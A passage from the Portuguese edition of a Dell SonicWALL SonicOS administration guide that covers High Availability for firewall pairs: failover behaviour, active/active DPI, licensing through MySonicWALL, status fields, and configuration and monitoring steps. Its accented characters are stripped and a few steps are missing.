1. Um usurio de PC conecta-se rede e o firewall Primrio cria uma sesso para o usurio.
2. O dispositivo Primrio sincroniza com o dispositivo Secundrio. O Secundrio agora possui
todas as informaes da sesso do usurio.
3. O administrador reinicia a unidade Primria.
4. A unidade Secundria detecta a reinicializao da unidade Primria e muda de Em espera
para Ativo.
5. O dispositivo Secundrio comea a enviar mensagens de ARP gratuitas para os switches
de LAN e WAN usando o mesmo endereo MAC virtual e endereo IP como o dispositivo
Primrio. No so necessrias atualizaes de roteamento para dispositivos de rede
downstream ou upstream.
6. Quando o usurio de PC tenta acessar uma pgina da Web, o dispositivo Secundrio tem
todas as informaes de sesso do usurio e capaz de continuar a sesso do usurio
sem interrupes.

Viso geral de AD de DPI ativa/ativa
Com a opo DPI ativa/ativa habilitada em um par de AD estvel, os servios de inspeo
profunda de pacotes so processados no firewall em espera de um par de AD simultaneamente
com o processamento do firewall, NAT e outros mdulos no firewall ativo. Os seguintes
servios de DPI so afetados:
Intrusion Prevention Service (IPS)
Antivrus do gateway (GAV)
Anti-Spyware no gateway
Para usar o recurso DPI ativa/ativa, o administrador deve configurar uma interface adicional
como a Interface de DPI ativa/ativa. Por exemplo, se voc optar por tornar X5 na Interface de
DPI ativa/ativa, voc deve conectar fisicamente X5 na unidade ativa a X5 na unidade em
espera no par de AD. Determinados fluxos de pacote na unidade ativa so selecionados e
descarregados para a unidade em espera na Interface de DPI ativa/ativa. A DPI executada
na unidade em espera e, em seguida, os resultados so retornados para a unidade ativa
atravs da mesma interface. O processamento restante realizado na unidade ativa.
Benefcios de AD de DPI ativa/ativa

A opo DPI ativa/ativa se baseia nos ciclos da CPU no utilizados disponveis na unidade em
espera, mas o trfego ainda chega e sai pela unidade ativa. A unidade em espera v somente
o trfego de rede descarregado pela unidade ativa e o processamento de todos os mdulos
diferentes de servios de DPI restrito para a unidade ativa.
Pr-requisitos de DPI ativa/em espera e ativa/ativa

Esta seo lista as plataformas suportadas, fornece recomendaes e requisitos para conectar
fisicamente as unidades e descreve como registrar, associar e licenciar as unidades de Alta
disponibilidade.
Plataformas com suporte para AD

A opo DPI ativa/ativa suportada apenas pelos modelos Dell SonicWALL a seguir:
SuperMassive 9600
SuperMassive 9400
SuperMassive 9200
NSA 6600
NSA 5600
Nota A opo DPI ativa/ativa compatvel com NSA 5600 e NSA 6600 com a aquisio de uma
licena expandida.
A opo DPI ativa/ativa no suportada pelos seguintes modelos Dell SonicWALL:

NSA 4600
NSA 3600
NSA 2600

Conectando fisicamente seus dispositivos
A Alta disponibilidade requer conexes fsicas adicionais entre os dispositivos Dell SonicWALL
afetados. Para todos os modos, voc precisa de conexes para Controle de AD e Dados de
AD. A opo DPI ativa/ativa requer uma conexo adicional.
Em qualquer implantao de Alta disponibilidade, voc deve conectar fisicamente as portas
LAN e WAN de todas as unidades aos switches apropriados.
importante que as interfaces de X0 de todas as unidades estejam conectadas ao mesmo
domnio de transmisso. Caso contrrio, o failover de trfego no funcionar. Alm disso, X0
a porta de AD redundante padro. Caso o link de controle AD normal falhar, X0 usado para
comunicar as pulsaes entre as unidades. Sem X0 no mesmo domnio de transmisso,
ambas as unidades ficam ativas se o link de controle AD falhar.
Uma conexo de WAN com a Internet til para registrar seus dispositivos em MySonicWALL
e para sincronizar as informaes de licenciamento. A menos que a comunicao em tempo
real com o servidor de licenciamento do SonicWALL no seja permitida devido poltica de
rede, a interface de WAN (X1) dever ser conectada antes de o registro e o licenciamento
serem executados.
Os dispositivos de segurana de rede Dell SonicWALL requerem as seguintes velocidades de
link de interface para cada interface de AD designada:
Interface de controle AD pode ser uma interface de 1 GB ou 10 GB. Recomenda-se de
1 GB.
Nota A Agregao de links e a Redundncia de portas no so suportadas na Interface

de Controle de AD.
Interface de dados AD pode ser uma interface de 1 GB ou 10 GB. Recomenda-se de

10GB.
A Interface de controle AD e a Interface de dados AD podem compartilhar a mesma
interface nica.
Se elas compartilharem uma nica interface, recomendvel uma de 10 GB.
Interface de DPI ativa/ativa pode ser uma interface de 1 GB ou 10 GB.
Conectar as interfaces de DPI ativa/ativa para DPI ativa/ativa

Para DPI ativa/ativa, voc deve conectar fisicamente pelo menos uma interface adicional,
denominada Interface de DPI ativa/ativa, entre os dois dispositivos em cada par de AD ou N
de cluster. As interfaces conectadas devem ter o mesmo nmero nos dois dispositivos e,
inicialmente, devem aparecer como interfaces no utilizadas e no atribudas na pgina Rede
> Interfaces. Por exemplo, voc pode conectar X5 na unidade Primria a X5 na Secundria
se X5 for uma interface no atribuda. Aps habilitar a DPI ativa/ativa, a interface conectada
ter uma atribuio de zona de Link de dados AD.
Determinados fluxos de pacote na unidade ativa so selecionados e descarregados para a
unidade em espera na Interface de DPI ativa/ativa. A DPI executada na unidade em espera
e, em seguida, os resultados so retornados para a unidade ativa atravs da mesma interface.
Opcionalmente, para redundncia de portas com DPI ativa/ativa, voc pode conectar
fisicamente uma segunda interface de DPI ativa/ativa entre os dois dispositivos em cada par
de AD. Essa interface assumir a transferncia de dados entre as duas unidades durante o
processamento de DPI ativa/ativa se a primeira interface de DPI ativa/ativa tiver uma falha.

Para se conectar a interfaces de DPI ativa/ativa para DPI ativa/ativa:
Etapa 1 Decida qual interface usar para a conexo adicional entre os dispositivos no par de AD. A
mesma interface deve ser selecionada em cada dispositivo.
Etapa 2 Na interface de gerenciamento do SonicOS, navegue at a pgina Rede > Interfaces e
certifique-se de que a Zona est No atribuda para a interface de DPI ativa/ativa pretendida.
Etapa 3 Usando um cabo Ethernet padro, conecte as duas interfaces diretamente uma outra.
Etapa 4 Opcionalmente, para redundncia de portas com DPI ativa/ativa, conecte fisicamente uma
segunda interface de DPI ativa/ativa entre os dois dispositivos em cada par de AD.
Registrar e associar dispositivos no MySonicWALL

Para usar a Alta disponibilidade, voc deve registrar os dois dispositivos e associ-los a AD no
MySonicWALL. Quando voc clica no link de um dispositivo registrado na sua pgina do
MySonicWALL, a pgina Gerenciamento de servios relativa a esse dispositivo exibida. Na
parte inferior da pgina Gerenciamento de servios, voc pode clicar no link de AD Secundria,
em Produtos associados. Em seguida, siga as instrues para selecionar e associar a outra
unidade para seu par de AD.
Depois que os dispositivos estejam associados como um par de AD, eles podem compartilhar
licenas. Alm das licenas de Alta disponibilidade, isso inclui a licena do SonicOS, a
assinatura de suporte e as licenas de servios de segurana. As nicas licenas que no so
compartilhveis so as de servios de consultoria, como o SonicWALL GMS Preventive
Maintenance Service.
No necessrio que os dispositivos Primrio e Secundrio tenham os mesmos servios de
segurana habilitados. As configuraes de servios de segurana sero atualizadas
automaticamente como parte da sincronizao inicial de configuraes. A sincronizao de
licenas utilizada para que o dispositivo Secundrio possa manter o mesmo nvel de proteo
de rede fornecido antes do failover.
O MySonicWALL fornece vrios mtodos de associao de dois dispositivos. Poder comear
por registrar um novo dispositivo e escolher uma unidade j registrada para realizar a
associao. Alternativamente, possvel associar duas unidades que j estejam registradas.
Tambm possvel iniciar o processo selecionando uma unidade registrada e adicionando um
novo dispositivo para associar.
Nota Mesmo que registre primeiro seus dispositivos em MySonicWALL, voc deve registrar
individualmente os dispositivos Primrio e Secundrio a partir da interface de
gerenciamento do SonicOS enquanto estiver conectado ao endereo IP de gerenciamento
individual de cada dispositivo. Isso permite que a unidade Secundria realize a
sincronizao com o servidor de licenas Dell SonicWALL e compartilhe licenas com o
dispositivo Primrio associado. Se o acesso Internet for restringido, voc poder aplicar
manualmente as licenas compartilhadas para ambos os dispositivos.
Para obter informaes sobre como configurar e usar o endereo IP de gerenciamento

individual de cada dispositivo, consulte Sobre Monitoramento de alta disponibilidade com ativo/
clustering na pgina 1123 e Alta disponibilidade > Monitoramento na pgina 1111.

Licenciar recursos de alta disponibilidade
As licenas de Clustering ativo/ativo, Alta disponibilidade estvel e DPI ativa/ativa esto
includas em firewalls registrados. Portanto, no necessrio adquirir licenas adicionais para
usar esses recursos de Alta disponibilidade.
Nota As licenas de Clustering ativo/ativo e Alta disponibilidade estvel devem ser ativadas em
cada dispositivo, registrando a unidade no MySonicWALL a partir da interface de
gerenciamento do SonicOS ou aplicando o conjunto de chaves de licena a cada unidade
se o acesso Internet no estiver disponvel.
Voc pode visualizar licenas de sistema na pgina Sistema > Licenas da interface de
gerenciamento. Essa pgina tambm fornece uma forma de efetuar logon no MySonicWALL.
Quando os firewalls no cluster ativo/ativo tm acesso Internet, cada dispositivo no cluster
deve ser registrado individualmente a partir da interface de gerenciamento do SonicOS
enquanto o administrador est conectado ao endereo IP de gerenciamento individual de cada
dispositivo. Isso permite que as unidades Secundrias realizem a sincronizao com o servidor
de licenciamento SonicWALL e compartilhem licenas com os dispositivos Primrios
associados em cada par de AD.
Tambm existe uma forma de sincronizar licenas para um par de AD cujos dispositivos no
possuem acesso Internet. Quando no permitida a comunicao em tempo real com o
servidor de licenciamento da SonicWALL devido poltica de rede, voc pode usar conjuntos
de chaves de licena para aplicar manualmente as licenas de servios de segurana nos seus
dispositivos. Quando voc registra um firewall em MySonicWALL, um conjunto de chaves de
licena gerado para o dispositivo. Se voc adicionar uma nova licena de servio de
segurana, o conjunto de chaves ser atualizado. No entanto, at que voc aplique as licenas
ao dispositivo, ele no poder executar os servios licenciados.
Nota Na implantao de Alta disponibilidade sem conectividade com a Internet, voc deve aplicar
o conjunto de chaves de licena aos dois dispositivos no par de AD.

A tabela a seguir mostra as licenas de AD que esto includas na compra do dispositivo de
segurana de rede Dell SonicWALL. Algumas plataformas necessitam de licenciamento
adicional para usar os recursos Sincronizao estvel ou DPI ativa/ativa. As licenas
expandidas do SonicOS ou as licenas de Alta disponibilidade podem ser adquiridas no
MySonicWALL ou em um revendedor da Dell SonicWALL.
Plataforma estvel DPI A/A
NSA 2600 Licena expandida ou N/D
licena de AD
NSA 3600 Licena expandida ou N/D
licena de AD
NSA 4600 Includo N/D
NSA 5600 Includo Expandida
A7014414
NSA 6600 Includo Expandida
A7014415
SM 9200 Includo Includo
Voc pode usar um dos procedimentos a seguir para aplicar licenas a um dispositivo:
Ativar licenas na interface de usurio do SonicOS na pgina 1099
Copiar o conjunto de chaves de licena de MySonicWALL na pgina 1100
Ativar licenas na interface de usurio do SonicOS

Siga o procedimento nesta seo para ativar licenas na interface de usurio do SonicOS.
Execute o procedimento para cada um dos dispositivos em um Par de alta disponibilidade
enquanto conectado ao seu endereo IP de gerenciamento de LAN individual.
Consulte Alta disponibilidade > Monitoramento na pgina 1111 para obter informaes sobre
como configurar os endereos IP individuais.
Etapa 1 Faa logon na interface de usurio do SonicOS usando o endereo IP de gerenciamento de

LAN individual do dispositivo.
Etapa 2 Na pgina Sistema > Licenas, em Gerenciar servios de segurana online, clique no link
Para ativar, fazer upgrade ou renovar servios, clique aqui.
Etapa 3 Na pgina Licenas > Gerenciamento de licenas, digite seu nome de usurio e sua senha
MySonicWALL nas caixas de texto.
Etapa 5 Na pgina Sistemas > Licenas, em Gerenciar servios de segurana online, verifique os
servios listados na tabela Resumo de servios de segurana.
Etapa 6 Repita este procedimento para o outro dispositivo no par de AD.

Copiar o conjunto de chaves de licena de MySonicWALL
Voc pode seguir o procedimento nesta seo para visualizar o conjunto de chaves de licena
no MySonicWALL e copi-lo para o firewall. Execute o procedimento para cada um dos
dispositivos em um Par de alta disponibilidade enquanto conectado ao seu endereo IP de
gerenciamento de LAN individual.
Consulte Alta disponibilidade > Monitoramento na pgina 1111 para obter informaes sobre
como configurar os endereos IP individuais.
Etapa 1 Faa logon na sua conta MySonicWALL em https://www.mysonicwall.com.

Etapa 2 No painel de navegao esquerda, clique em Meus produtos.
Etapa 3 Na pgina Meus produtos, em Produtos registrados, role para baixo para localizar o
dispositivo para o qual voc deseja copiar o conjunto de chaves de licena. Clique no nome do
produto ou no nmero de srie.
Etapa 4 Na pgina Gerenciamento de servios, clique em Visualizar conjunto de chaves de licena.
Etapa 5 Na pgina Conjunto de chaves de licena, use o mouse para destacar todos os caracteres na
caixa de texto.
Etapa 6 Para copiar o conjunto de chaves de licena para a rea de transferncia, pressione Ctrl+C.
Etapa 7 Faa logon na interface de usurio do SonicOS usando o endereo IP de gerenciamento de
LAN individual.
Etapa 8 Na pgina Sistemas > Licenas, em Atualizao Manual, pressione Ctrl+V para colar o
conjunto de chaves de licena na caixa de texto Ou inserir conjunto de chaves.
Etapa 10 Repita este procedimento para o outro dispositivo no par de AD.

Alta disponibilidade > Status
As sees seguintes descrevem a pgina Alta disponibilidade > Status:
Status de alta disponibilidade ativa/em espera na pgina 1101
Status de alta disponibilidade ativa/ativa na pgina 1104
Status de alta disponibilidade ativa/em espera

A tabela Status de alta disponibilidade na pgina Alta disponibilidade > Status exibe o
status atual do par de AD. Se o SonicWALL Primrio estiver Ativo, a primeira linha na tabela
indica que o SonicWALL Primrio est atualmente Ativo.
Tambm possvel verificar o status do SonicWALL Secundrio efetuando logon no endereo
IP de LAN exclusivo do SonicWALL Secundrio. Se o SonicWALL Primrio estiver funcionando
normalmente, o status indica que o SonicWALL Secundrio est atualmente Em espera. Se o
Secundrio assumiu a funo do Primrio, a tabela de status indica que o Secundrio est
Ativo no momento.
Em caso de falha no SonicWALL Primrio, voc pode acessar a interface de gerenciamento do
SonicWALL Secundrio no endereo IP de LAN virtual do SonicWALL Primrio ou no endereo
IP de LAN do SonicWALL Secundrio. Quando o SonicWALL Primrio reiniciado aps uma
falha, ele fica acessvel usando o endereo IP exclusivo criado na pgina Alta disponibilidade
> Monitoramento. Se o modo de preempo estiver habilitado, o SonicWALL Primrio se torna
no firewall Ativo e o firewall Secundrio retorna ao status Em espera.
A tabela exibe as seguintes informaes:
Status de alta disponibilidade

Status indica o estado de AD do firewall Primrio. Os valores possveis so:
Primrio ativo indica que o dispositivo de AD Primrio est no estado ATIVO.
Primrio em espera indica que este dispositivo est no estado em espera.

Primrio desabilitado indica que a Alta disponibilidade no foi habilitada na
interface de gerenciamento deste dispositivo.
Primrio no est em um estado estvel indica que a AD est habilitada e o
dispositivo no est no estado ATIVO nem no estado em espera.
Estado primrio indica o estado atual do dispositivo Primrio como um membro de um
par de AD. O campo Estado primrio exibido nos dispositivos Primrio e Secundrio. Os
valores possveis so:
ATIVO indica que a unidade Primria est manipulando todo o trfego de rede,
exceto o trfego de gerenciamento/monitoramento/licenciamento destinado para a
unidade em espera.
em espera indica que a unidade Primria passiva e est pronta para assumir em
um failover.
SELEO indica que as unidades Primria e Secundria esto negociando qual
deve ser a unidade ATIVA.
SINCRONIZAR indica que a unidade Primria est sincronizando configuraes ou
firmware com a Secundria.
ERRO indica que a unidade Primria atingiu uma condio de erro.
REINICIALIZAR indica que a unidade Primria est sendo reinicializada.
NENHUM quando visualizado na unidade Primria, NENHUM indica que a AD no
est habilitada na Primria. Quando visualizado na unidade Secundria, NENHUM
indica que a unidade Secundria no est recebendo pulsaes da unidade Primria.
Estado secundrio indica o estado atual do dispositivo Secundrio como membro de um
par de AD. O campo Estado secundrio exibido nos dispositivos Primrio e Secundrio.
Os valores possveis so:
ATIVO indica que a unidade Secundria est manipulando todo o trfego de rede,
exceto o trfego de gerenciamento/monitoramento/licenciamento destinado unidade
em espera.
em espera indica que a unidade Secundria passiva e est pronta para assumir
em um failover.
SELEO indica que as unidades Secundria e Primria esto negociando qual
deve ser a unidade ATIVA.
SINCRONIZAR indica que a unidade Secundria est sincronizando configuraes
ou firmware com a Primria.
ERRO indica que a unidade Secundria atingiu uma condio de erro.
REINICIALIZAR indica que a unidade Secundria est sendo reinicializada.
NENHUM quando visualizado na unidade Secundria, NENHUM indica que a AD no
est habilitada na Secundria. Quando visualizado na unidade Primria, NENHUM
indica que a unidade Primria no est recebendo pulsaes da unidade Secundria.
Tempo de ativao indica quanto tempo o firewall Ativo atual esteve Ativo desde a ltima
vez que ficou Ativo. Esta linha exibida apenas quando a Alta disponibilidade est
habilitada. Se ocorrer falha do SonicWALL Primrio, o SonicWALL Secundrio assume os
endereos IP de WAN e LAN do SonicWALL Primrio. Existem trs mtodos principais para
verificar o status do Par de alta disponibilidade: a janela Status de alta disponibilidade,
alertas de e-mail e o log de visualizao. Esses mtodos esto descritos nas sees a
seguir.
Status do n indica se o Clustering ativo/ativo est habilitado ou no est habilitado.
Par encontrado indica se a unidade Primria descobriu a unidade Secundria. Os
valores possveis so Sim e No.

Configuraes sincronizadas indica se as configuraes de AD esto sincronizadas
entre as unidades Primria e Secundria. Os valores possveis so Sim e No.
AD estvel sincronizada indica se as configuraes de sincronizao estvel esto
sincronizadas entre as unidades Primria e Secundria. Os valores possveis so Sim e
No.
Configurao de alta disponibilidade

Modo AD um mtodo para determinar qual SonicWALL est Ativo verificar o indicador
de Status de configuraes de AD na pgina Alta disponibilidade > Configuraes. Se
o SonicWALL Primrio estiver Ativo, a primeira linha na pgina indica que o SonicWALL
Primrio est atualmente Ativo. Tambm possvel verificar o status do SonicWALL
Secundrio efetuando logon no endereo IP da LAN do SonicWALL Secundrio. Se o
SonicWALL Primrio estiver funcionando normalmente, o status indica que o SonicWALL
Secundrio est atualmente Em espera. Se o Secundrio assumiu a funo do Primrio,
o status indica que o Secundrio est Ativo no momento. Em caso de falha no SonicWALL
Primrio, voc pode acessar a interface de gerenciamento do SonicWALL Secundrio no
endereo IP de LAN do SonicWALL Primrio ou no endereo IP de LAN do SonicWALL
Secundrio. Quando o SonicWALL Primrio reinicia aps uma falha, ele acessvel
usando o terceiro endereo IP criado durante a configurao. Se o modo de preempo
estiver habilitado, o SonicWALL Primrio se torna no firewall Ativo e o firewall Secundrio
retorna ao status Em espera.
Link de controle AD indica a porta, a velocidade e as configuraes de duplex do link
de AD, como AD 1000 Mbps full-duplex, quando os dois firewalls so conectados atravs
de suas interfaces AD especificadas. Quando a Alta disponibilidade no estiver habilitada,
o campo exibe Desabilitada.
Link de dados AD indica a porta, a velocidade e as configuraes de duplex do link de
AD, como AD 1000 Mbps full-duplex, quando os dois firewalls so conectados atravs de
suas interfaces de AD especificadas. Quando a Alta disponibilidade no estiver habilitada,
o campo exibe Desabilitada.
Licenas de alta disponibilidade

AD estvel primria licenciada indica se o dispositivo Primrio tem uma licena de AD
estvel. Os valores possveis so Sim ou No.
AD estvel secundria licenciada indica se o dispositivo Secundrio tem uma licena
de AD estvel. Os valores possveis so Sim ou No. Observe que a licena de AD estvel
compartilhada com o Primrio, mas voc deve acessar mysonicwall.com enquanto
estiver conectado ao endereo IP de gerenciamento de LAN da unidade Secundria para
realizar a sincronizao com o servidor de licenciamento do SonicWALL.
Ativo/ativo primrio licenciado indica se o dispositivo Primrio tem uma licena ativa/
ativa. Os valores possveis so Sim ou No.

Status de alta disponibilidade ativa/ativa
A pgina Alta disponibilidade > Status fornece o status de todo o Cluster ativo/ativo e de
cada N de cluster na implantao. O status do Cluster ativo/ativo exibido na tabela superior
e o status de cada N de cluster ser exibido na tabela inferior.
Para obter informaes adicionais sobre o status de Alta disponibilidade e verificar a

configurao, consulte Verificar a configurao de Clustering ativo/ativo na pgina 1139
Alta disponibilidade > Configuraes

As sees a seguir descrevem como configurar a pgina Alta disponibilidade >
Configuraes:
Definir configuraes de alta disponibilidade ativa/em espera na pgina 1105
Definir configuraes de alta disponibilidade de DPI ativa/ativa na pgina 1107
Nota Para obter mais informaes sobre a Alta disponibilidade, consulte Viso geral da Alta
disponibilidade na pgina 1087 e Pr-requisitos de DPI ativa/em espera e ativa/ativa na
pgina 1095. Se seu ambiente de Clustering ativo/ativo usar VPN ou NAT, consulte
Configurar VPN e NAT com Clustering ativo/ativo na pgina 1136 depois de concluir a
configurao de Ativo/ativo.

Definir configuraes de alta disponibilidade ativa/em espera
As tarefas de configurao na pgina Alta disponibilidade > Configuraes so realizadas
Para configurar Ativo/Em espera na pgina Alta disponibilidade > Configuraes, execute
Etapa 1 Faa logon como administrador na interface de usurio do SonicOS no SonicWALL Primrio.
Etapa 2 No painel de navegao esquerda, navegue at Alta disponibilidade > Configuraes. A
guia Geral exibida.
Etapa 3 No menu suspenso Modo, selecione Ativo/Em espera.

Etapa 4 Para configurar a Alta disponibilidade estvel, selecione Habilitar sincronizao estvel. Os
campos so exibidos com as configuraes recomendadas para os campos Intervalo de
pulsao e Intervalo de investigao. As configuraes exibidas so valores mnimos
recomendados. Valores mais baixos causam failovers desnecessrios, especialmente quando
o SonicWALL est sobrecarregado. Voc pode usar valores superiores se seu SonicWALL lidar
com muito trfego de rede.

Quando a Alta disponibilidade estvel no estiver habilitada, o estado da sesso no est
sincronizado entre os firewalls Primrio e Secundrio. Se ocorrer um failover, qualquer
sesso que estava ativa no momento do failover precisa ser renegociada.
Etapa 5 Para fazer um backup das configuraes quando voc atualizar, selecione Gerar/Substituir
firmware e configuraes de backup ao atualizar firmware.
Etapa 6 Para configurar o Par de alta disponibilidade para que a unidade Primria devolva a funo
Primria depois de reiniciar aps uma falha, selecione Habilitar modo preemptivo.
Recomenda-se desabilitar o modo preemptivo quando se habilitar a Alta disponibilidade
estvel, pois o modo preemptivo pode ser demasiado agressivo no que diz respeito ao failover
no dispositivo Secundrio.
Etapa 7 Marque a caixa de seleo Habilitar MAC virtual para permitir que os dispositivos Primrio e
Secundrio compartilhem um nico endereo MAC. Isso simplifica muito o processo de
atualizao de tabelas ARP de rede e caches quando ocorrer um failover. Somente o switch
ao qual os dois dispositivos esto conectados precisa ser notificado. Todos os dispositivos
externos continuaro sendo roteados para o nico endereo MAC compartilhado.
Etapa 8 Clique na guia Dispositivos AD para configurar o nmero de srie dos dispositivos Primrio
e Secundrio.
Etapa 9 Insira o Nmero de srie do Dispositivo secundrio.

Etapa 10 Clique na guia Interfaces de AD.

Etapa 11 Selecione a interface da Interface de controle AD. Esta opo fica acinzentada se o
dispositivo detectar que a interface j est configurada.
Etapa 12 Selecione a interface da Interface de DPI ativa/ativa. Esta opo fica acinzentada se o
Etapa 13 Quando terminar todas as configuraes de Alta disponibilidade, clique em Aplicar. Todas as
configuraes sero sincronizadas com a unidade Em espera e a unidade Em espera ir
reinicializar.
Definir configuraes de alta disponibilidade de DPI ativa/ativa

As tarefas de configurao na pgina Alta disponibilidade > Configuraes so realizadas
Para configurar DPI ativa/ativa na pgina Alta disponibilidade > Configuraes, execute as
seguintes etapas:
Etapa 1 No painel de navegao esquerda, navegue at Alta disponibilidade > Configuraes. A

guia Geral exibida.
Etapa 2 No menu suspenso Modo, selecione DPI ativa/ativa.

Etapa 3 A opo Habilitar sincronizao estvel automaticamente habilitada para DPI ativa/ativa e
a opo fica acinzentada.
Etapa 4 Para fazer um backup das configuraes quando voc atualizar, selecione Gerar/Substituir
firmware e configuraes de backup ao atualizar firmware.
Etapa 5 Em condies normais, a opo Habilitar modo preemptivo deve ser desabilitada para DPI
ativa/ativa. Esta opo instrui a unidade Primria a devolver a funo Primria depois de
reiniciar aps uma falha. Portanto, essa opo somente se aplica a configuraes Ativo/Em
espera.

Etapa 6 Marque a caixa de seleo Habilitar MAC virtual para permitir que os dois dispositivos no par
de AD compartilhem um nico endereo MAC. Isto simplifica consideravelmente o processo de
atualizao de caches e tabelas ARP de rede quando ocorre um failover. Somente o switch ao
qual os dois dispositivos esto conectados precisa ser notificado. Todos os dispositivos
externos continuaro sendo roteados para o nico endereo MAC compartilhado.
Etapa 7 Clique na guia Dispositivos AD.
Etapa 8 Insira o Nmero de srie do Dispositivo secundrio.

Etapa 9 Clique na guia Interfaces de AD.
Etapa 10 Selecione a interface da Interface de controle AD. Esta opo fica acinzentada se o
Etapa 11 Selecione o nmero de interface da Interface de DPI ativa/ativa. Esta opo fica acinzentada
se o dispositivo detectar que a interface j est configurada.
Etapa 12 Selecione a Interface de DPI ativa/ativa. Essa interface ser usada para transferir dados
entre as duas unidades durante o processamento de DPI ativa/ativa. Somente as interfaces
no atribudas e disponveis aparecem na lista. As interfaces conectadas devem ter o mesmo
nmero nos dois dispositivos e, inicialmente, devem aparecer como interfaces no utilizadas
e no atribudas na pgina Rede > Interfaces. Por exemplo, voc pode conectar X5 na unidade
Primria a X5 na Secundria se X5 for uma interface no atribuda. Aps habilitar a DPI ativa/
ativa, a interface conectada ter uma Atribuio de zona de Link de dados AD.
reinicializar.

Alta disponibilidade > Avanado
A pgina Alta disponibilidade > Avanado permite ajustar a configurao de Alta
disponibilidade, bem como sincronizar a configurao e o firmware entre os dispositivos de Alta
disponibilidade. A pgina Alta disponibilidade > Avanado idntica para as configuraes
Ativo/Em espera e Ativo/Ativo. As configuraes de Intervalo de pulsao e Nvel de
acionamento de failover na pgina Alta disponibilidade > Avanado aplicam-se s
pulsaes SVRRP (pulsao de Clustering ativo/ativo) e s pulsaes de AD.
Outras configuraes na pgina Alta disponibilidade > Avanado aplicam-se somente aos
pares de AD nos Ns do cluster.
Nota Para obter mais informaes sobre a Alta disponibilidade, consulte Viso geral da Alta
disponibilidade na pgina 1087 e Pr-requisitos de DPI ativa/em espera e ativa/ativa na
pgina 1095.

Configurar Alta disponibilidade > Avanado
Para definir as configuraes na pgina Alta disponibilidade > Avanado, execute as
seguintes etapas:
Etapa 1 Efetue logon como administrador na interface de gerenciamento do SonicOS no N mestre, ou

seja, no endereo IP do grupo 1 virtual (em X0 ou outra interface com o gerenciamento de
HTTP habilitado).
Etapa 2 No painel de navegao esquerda, navegue at Alta disponibilidade > Avanado.
Etapa 3 Opcionalmente, ajuste o Intervalo de pulsao para controlar com que frequncia as
unidades no Cluster ativo/ativo se comunicam. O padro de 1000 milissegundos, o valor
mnimo suportado 1000 milissegundos. Voc pode usar valores superiores se sua
implantao lidar com muito trfego de rede. Esta configurao se aplica a todas as unidades
no Cluster ativo/ativo.
Etapa 4 Defina o Nvel de acionamento de failover para o nmero de pulsaes que podem ser
perdidas antes do failover. O valor padro de 5, o valor mnimo 4 e o valor mximo 99.
Se o Nvel de acionamento de failover for definido como 5 e o Intervalo de pulsao for
definido como 1000 milissegundos, decorrero 5 segundos sem uma pulsao antes do
acionamento de um failover. Esta configurao se aplica a todas as unidades no Cluster ativo/
ativo.
Etapa 5 Defina o Intervalo de investigao em segundos entre as investigaes enviadas para os
endereos IP especificados para monitorar se o caminho crtico de rede ainda alcanvel.
Isso usado no monitoramento lgico para o par de AD local. A SonicWALL recomenda que
voc defina o intervalo de, pelo menos, 5 segundos. O padro 20 segundos e o intervalo
permitido de 5 a 255 segundos. Voc pode definir o(s) Endereo(s) IP de investigao na
tela Alta disponibilidade > Monitoramento. Consulte Alta disponibilidade > Monitoramento na
pgina 1111.
Etapa 6 Defina a Contagem de investigao para o nmero de investigaes consecutivas antes de
o SonicOS concluir que o caminho crtico de rede no est disponvel ou o destino de
investigao est inacessvel. Isso usado no monitoramento lgico para o par de AD local.
O padro 3 e o intervalo permitido de 3 a 10.
Etapa 7 Defina a Hora de atraso de seleo para o nmero de segundos permitido para
processamento interno entre as duas unidades no par de AD local antes de uma delas assumir
a funo de Primrio. O padro 3 segundos, o mnimo 3 segundos e o mximo 255
segundos.
Etapa 8 Defina o Tempo de manter pressionada a rota dinmica para o nmero de segundos que o
dispositivo recentemente ativo mantm as rotas dinmicas que aprendeu anteriormente em
sua tabela de rotas. Essa configurao usada quando ocorre um failover em um par de Alta
disponibilidade que est usando roteamento dinmico RIP ou OSPF. Durante esse tempo, o
dispositivo recentemente ativo reaprende as rotas dinmicas na rede. Quando a durao de
Tempo de manter pressionada a rota dinmica expira, o SonicOS exclui as rotas antigas e
implementa as rotas novas aprendidas de RIP ou OSPF. O valor padro 45 segundos, o
mnimo 0 segundos e o mximo 1200 segundos (20 minutos). Em redes grandes ou
complexas, um valor maior pode melhorar a estabilidade da rede durante um failover.

Nota A configurao Tempo de manter pressionada a rota dinmica exibida somente quando
a opo Roteamento avanado selecionada na pgina Rede > Roteamento.
Etapa 9 Se desejar que um Failover ocorra somente quando TODOS os links agregados estiverem
inativos, selecione a caixa de seleo
Failover ativo/em espera somente quando TODOS os links agregados estiverem
inativos.
Etapa 10 Marque a caixa de seleo Incluir certificados/chaves para que os dispositivos sincronizem
todos os certificados e todas as chaves no par de AD.
Etapa 11 (Opcional) Clique no boto Sincronizar configuraes. Esta ao sincroniza as
configuraes de preferncia do SonicOS entre suas unidades de AD primria e secundria.
Etapa 12 (Opcional) Clique no boto Sincronizar firmware. Esta ao sincroniza a verso do firmware
entre suas unidades de AD primria e secundria.
Etapa 13 (Opcional) Clique no cone Forar failover. Esta ao tenta um failover de AD ativa/em espera
unidade secundria. Use essa ao para testar se a funcionalidade de failover de AD est
funcionando corretamente.
Etapa 14 Quando terminar todas as configuraes de Alta disponibilidade, clique em Aceitar. Todas as
configuraes sero sincronizadas com as outras unidades no cluster.
Alta disponibilidade > Monitoramento

Na pgina Alta disponibilidade > Monitoramento, voc pode configurar endereos IP de
gerenciamento independente para cada unidade no par de AD usando interfaces de LAN ou
WAN. Voc tambm pode configurar monitoramento de link/fsico e monitoramento de
investigao/lgico. Para obter mais informaes sobre as configuraes de monitoramento de
AD, consulte Sobre o monitoramento de AD na pgina 1091.

Monitoramento de alta disponibilidade ativa/em espera
Configurar monitoramento de alta disponibilidade ativa/em espera

Para definir os endereos IP de gerenciamento de LAN independentes e configurar
monitoramento de interface fsico e/ou lgico, execute as seguintes etapas:
Etapa 1 Faa logon como administrador na interface de usurio do SonicOS no SonicWALL Primrio.
Etapa 2 No painel de navegao esquerda, navegue at Alta disponibilidade > Monitoramento.
Etapa 3 Clique no cone Configurar de uma interface na LAN, como X0.

.
Etapa 4 Para habilitar a deteco de link entre as interfaces de AD designadas nas unidades Primria
e Secundria, deixe a caixa de seleo Habilitar monitoramento de interface fsica
marcada.
Etapa 5 No campo Endereo IPv4 primrio, digite o endereo IP de gerenciamento de LAN exclusivo
da unidade Primria.
Etapa 6 No campo Endereo IPv4 secundrio, digite o endereo IP de gerenciamento de LAN
exclusivo da unidade Secundria.

